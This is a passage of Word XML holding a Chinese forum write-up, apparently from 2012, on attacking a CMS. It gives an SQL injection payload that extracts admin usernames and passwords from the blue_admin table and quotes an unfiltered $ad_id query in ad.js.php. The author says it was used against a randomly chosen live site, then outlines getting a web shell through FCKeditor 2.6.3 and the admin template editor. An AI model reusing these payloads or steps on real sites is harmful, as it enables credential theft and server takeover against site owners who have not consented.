            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>毕竟人的思维太宽了。因为这是个</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>insert</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>的语句，我们可以插入我们想要的信息，然后通过前台页面显示出来，</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>我们可以这样子构造语句</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
              <w:t>a','xxx'),('','1','1','1','2',(select concat(admin_name,0x3a,pwd) from blue_admin limit 0,1),'1645457407','sss','1')#</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>前面的闭合前面一个</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>insert</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>语句，因为</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>insert</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>语句的话，我们可以</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>insert into table (a,b,c) values ('fuck1','fuck2','fuck3'),('fuck4','fuck5','fuck6')......</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>这样可以多插几个的。这样子，我们就可以意淫了，</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>我们测试下</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>看到了么？用户名和密码已经被我们搞到手了</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="12" name="图片 12" descr="https://forum.90sec.org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forum.90sec.org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6B98">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="3848100" cy="1133475"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="11" name="图片 11" descr="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5378" descr="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10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6B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId25" w:tgtFrame="_blank" w:tooltip="5.jpg" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:b/>
                  <w:bCs/>
                  <w:vanish/>
                </w:rPr>
                <w:t>下载</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (9.35 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>2012-8-26 23:42</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>这是其一。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">0x02 </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>继续上个注入</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> ad.js.php</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>中</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> 19</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>行</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:hyperlink r:id="rId26" w:anchor="viewSource" w:tooltip="预览源代码" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>预览源代码</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_i1037" type="#_x0000_t75" style="width:18pt;height:18pt" o:ole="">
                  <v:imagedata r:id="rId10" o:title=""/>
                </v:shape>
                <w:control r:id="rId27" w:name="对象 13" w:shapeid="_x0000_i1037"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:hyperlink r:id="rId28" w:anchor="printSource" w:tooltip="打印" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>打印</w:t>
              </w:r>
            </w:hyperlink>
            <w:hyperlink r:id="rId29" w:anchor="about" w:tooltip="关于" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>关于</w:t>
              </w:r>
            </w:hyperlink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"/>
              <w:gridCol w:w="5740"/>
            </w:tblGrid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1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$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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lastRenderedPageBreak/>
                    <w:t>2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if(empty($ad_id))</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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"/>
              <w:gridCol w:w="1859"/>
            </w:tblGrid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3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{</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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4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echo 'Error!';</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98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"/>
              <w:gridCol w:w="1245"/>
            </w:tblGrid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5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exit();</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr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6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}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="0" w:type="auto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"/>
              <w:gridCol w:w="7210"/>
            </w:tblGrid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7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/>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidTr="00E66B98">
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="0" w:type="auto"/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8</w:t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75" w:type="dxa"/>
                    <w:bottom w:w="300" w:type="dxa"/>
                    <w:right w:w="375" w:type="dxa"/>
                  </w:tcMar>
                  <w:vAlign w:val="center"/>
                  <w:hideMark/>
                </w:tcPr>
                <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
                  <w:r w:rsidRPr="00E66B98">
                    <w:t>$ad = $db-&gt;getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:t>这里的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>$ad_id</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>未经过任何过滤就传过来了，并且这里就直接注入了</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>所以这里就是赤裸裸的注入</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>所以这里随便选取个站，已经取到</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="10" name="图片 10" descr="https://forum.90sec.org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forum.90sec.org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6B98">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5153025" cy="1152525"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                  <wp:docPr id="9" name="图片 9" descr="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5379" descr="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0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6B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId31" w:tgtFrame="_blank" w:tooltip="6.jpg" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:b/>
                  <w:bCs/>
                  <w:vanish/>
                </w:rPr>
                <w:t>下载</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (16.43 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>2012-8-26 23:43</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0x03 getshell</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>再说一下，直接</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>getshell</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>把</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>由于存在</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>fck</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>版本，</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>2.6.3</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:lastRenderedPageBreak/>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>直接</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>getshell</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="8" name="图片 8" descr="https://forum.90sec.org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forum.90sec.org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6B98">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5715000" cy="1752600"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="7" name="图片 7" descr="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5380" descr="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6B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId33" w:tgtFrame="_blank" w:tooltip="7.jpg" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:b/>
                  <w:bCs/>
                  <w:vanish/>
                </w:rPr>
                <w:t>下载</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (67.52 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>2012-8-26 23:44</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">0x04 </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>后台拿</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>来到系统设置</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>再到</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>模板管理</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>然后点击编辑</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>这里编辑的是模板</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="6" name="图片 6" descr="https://forum.90sec.org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forum.90sec.org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6B98">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="3781425" cy="2305050"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                  <wp:docPr id="5" name="图片 5" descr="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5381" descr="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1425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6B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId35" w:tgtFrame="_blank" w:tooltip="8.jpg" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:b/>
                  <w:bCs/>
                  <w:vanish/>
                </w:rPr>
                <w:t>下载</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (25.89 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>2012-8-26 23:46</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>然后点编辑</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="4" name="图片 4" descr="https://forum.90sec.org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forum.90sec.org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6B98">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5715000" cy="2962275"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="3" name="图片 3" descr="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5382" descr="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6B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId37" w:tgtFrame="_blank" w:tooltip="9.jpg" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:b/>
                  <w:bCs/>
                  <w:vanish/>
                </w:rPr>
                <w:t>下载</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (91.07 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>2012-8-26 23:48</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>我们跳到上层目录去</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="190500" cy="190500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2" name="图片 2" descr="https://forum.90sec.org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forum.90sec.org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6B98">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="5715000" cy="2143125"/>
                  <wp:effectExtent l="0" t="0" r="0" b="9525"/>
                  <wp:docPr id="1" name="图片 1" descr="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5383" descr="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6B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId39" w:tgtFrame="_blank" w:tooltip="10.jpg" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:b/>
                  <w:bCs/>
                  <w:vanish/>
                </w:rPr>
                <w:t>下载</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t xml:space="preserve"> (32.96 KB)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:pPr>
              <w:rPr>
                <w:vanish/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E66B98">
              <w:rPr>
                <w:vanish/>
              </w:rPr>
              <w:t>2012-8-26 23:49</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E66B98" w:rsidRPr="00E66B98" w:rsidRDefault="00E66B98" w:rsidP="00E66B98">
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>可能问题还很多。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>总之一句，无论一套程序出现的安全问题多大，我还是不会去鄙视这些程序员，因为真正的一套</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>cms</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>要我来开发，我只能说我。。。。。。，以前我也是怀着</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>BS</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>的心态去看待一些爆有很多安全问题的程序。终于当有一天去做开发，我就明白了。其实俺当初怀着</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>SB</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>的心态去看我今天写的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>SB</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>程序。所以最后一句还是那句，尊重别人的劳动果实。转摘请注明转自</w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId40" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00E66B98">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                </w:rPr>
                <w:t>http://hi.baidu.com/sethc5/blog</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00E66B98">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E66B98">
              <w:t>西毒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000E37B2" w:rsidRDefault="000E37B2"/>
    <w:sectPr w:rsidR="000E3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FBA"/>
    <w:rsid w:val="000E37B2"/>
    <w:rsid w:val="00E22FBA"/>
    <w:rsid w:val="00E6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6B9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66B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6B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6B9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66B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6B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4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168">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="36" w:space="0" w:color="333333"/>
            <w:left w:val="single" w:sz="36" w:space="0" w:color="333333"/>
            <w:bottom w:val="single" w:sz="36" w:space="8" w:color="333333"/>
            <w:right w:val="single" w:sz="36" w:space="0" w:color="333333"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="7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1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197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888888"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="4736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7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888888"/>
                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="198300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222790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1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06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29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064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72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51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22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39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07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1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66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16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53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72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53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2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76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09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15598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85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72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65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79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45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1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410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888888"/>
                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="382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575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888888"/>
                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="55628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67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888888"/>
                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="201060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974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888888"/>
                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="3246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655082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65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9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7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875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68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18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08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03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687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888888"/>
                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="35593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114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888888"/>
                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="888888"/>
                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="888888"/>
